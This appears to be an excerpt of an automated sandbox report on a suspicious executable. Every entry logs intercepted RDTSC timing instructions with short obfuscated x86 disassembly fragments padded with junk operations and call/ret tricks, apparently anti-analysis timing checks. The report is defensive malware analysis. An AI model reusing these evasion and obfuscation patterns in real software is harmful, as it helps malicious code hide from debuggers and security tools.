                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA1F2 second address: 10FA216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 760A227Bh 0x0000000d mov dl, FDh 0x0000000f lea ebx, dword ptr [ebp+12455E2Bh] 0x00000015 mov si, bx 0x00000018 mov dword ptr [ebp+122D37E4h], edx 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA216 second address: 10FA21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA21A second address: 10FA22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD09CB0C7EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA2E8 second address: 10FA2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FD09CF151BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA2FD second address: 10FA301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA301 second address: 10FA306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA39C second address: 10FA3C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD09CB0C7EFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA3C7 second address: 10FA3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA3CB second address: 10FA3E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD09CB0C7EEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 111AF03 second address: 111AF0D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1118D51 second address: 1118D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 11192C2 second address: 11192C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 111952D second address: 1119531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119531 second address: 1119543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD09CF151B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119543 second address: 1119547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 11199BE second address: 11199C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 11199C2 second address: 11199D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnl 00007FD09CB0C7E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 11199D2 second address: 11199D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 11199D8 second address: 11199E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119C29 second address: 1119C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119C31 second address: 1119C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FD09CB0C7F2h 0x0000000b ja 00007FD09CB0C7E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119C44 second address: 1119C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119DA7 second address: 1119DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119DAB second address: 1119DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119DB1 second address: 1119DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119DBB second address: 1119DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119F5C second address: 1119F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119F76 second address: 1119F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FD09CF151C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119F83 second address: 1119F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119F89 second address: 1119F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 1119F90 second address: 1119F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD09CB0C7E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A60C second address: 111A625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FD09CF151C0h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A625 second address: 111A62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A91B second address: 111A91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A91F second address: 111A95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007FD09CB0C7E6h 0x00000011 js 00007FD09CB0C7E6h 0x00000017 popad 0x00000018 jmp 00007FD09CB0C7F6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FD09CB0C7EEh 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A95A second address: 111A96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A96B second address: 111A972 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10E3D72 second address: 10E3D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10E3D76 second address: 10E3DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FD09CB0C7F5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jmp 00007FD09CB0C7F9h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD09CB0C7EFh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1121DB9 second address: 1121DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1121DD1 second address: 1121DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D9AA0 second address: 10D9AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D9AA6 second address: 10D9AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125278 second address: 112528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD09CF151B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112528A second address: 1125290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125290 second address: 112529A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D9A8C second address: 10D9AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD09CB0C7ECh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11256F2 second address: 11256F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112583D second address: 1125843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125843 second address: 1125848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125848 second address: 112584D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112584D second address: 1125853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125853 second address: 1125875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD09CB0C7E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD09CB0C7F5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11259B2 second address: 11259C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a ja 00007FD09CF151B6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11259C2 second address: 11259C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11259C8 second address: 11259D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112705F second address: 1127064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11273F0 second address: 1127403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127403 second address: 1127407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127407 second address: 112740B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11274B7 second address: 11274C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD09CB0C7E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127687 second address: 112768B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127748 second address: 1127751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127BFC second address: 1127C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127C0F second address: 1127C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127C13 second address: 1127C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD09CF151B8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 jns 00007FD09CF151B6h 0x0000002b push eax 0x0000002c jo 00007FD09CF151BEh 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127D96 second address: 1127D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127D9C second address: 1127DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e je 00007FD09CF151B6h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F6B second address: 1127F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F71 second address: 1127F88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FD09CF151B8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F88 second address: 1127F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F8E second address: 1127F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128132 second address: 112818B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD09CB0C7EEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FD09CB0C7E8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007FD09CB0C7F8h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 jo 00007FD09CB0C7E6h 0x00000037 pop ebx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112818B second address: 1128195 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128620 second address: 1128643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD09CB0C7F5h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128643 second address: 1128655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128655 second address: 11286C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov ax, 6B00h 0x0000000e jc 00007FD09CB0C7ECh 0x00000014 mov edi, dword ptr [ebp+122D2D21h] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d jmp 00007FD09CB0C7F6h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD09CB0C7E8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e sbb di, A1FBh 0x00000043 clc 0x00000044 xchg eax, ebx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD09CB0C7ECh 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11286C5 second address: 11286E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD09CF151BCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD09CF151BAh 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11286E9 second address: 11286EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11290C0 second address: 1129140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FD09CF151C6h 0x0000000b nop 0x0000000c sbb si, AC25h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FD09CF151B8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FD09CF151B8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 movzx edi, di 0x0000004c mov edi, dword ptr [ebp+122D2E69h] 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FD09CF151B6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129140 second address: 112914A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112914A second address: 1129150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129150 second address: 1129154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112A2C0 second address: 112A2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129A72 second address: 1129A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CB0C7F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112AACD second address: 112AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112AAD6 second address: 112AADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112AADA second address: 112AADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
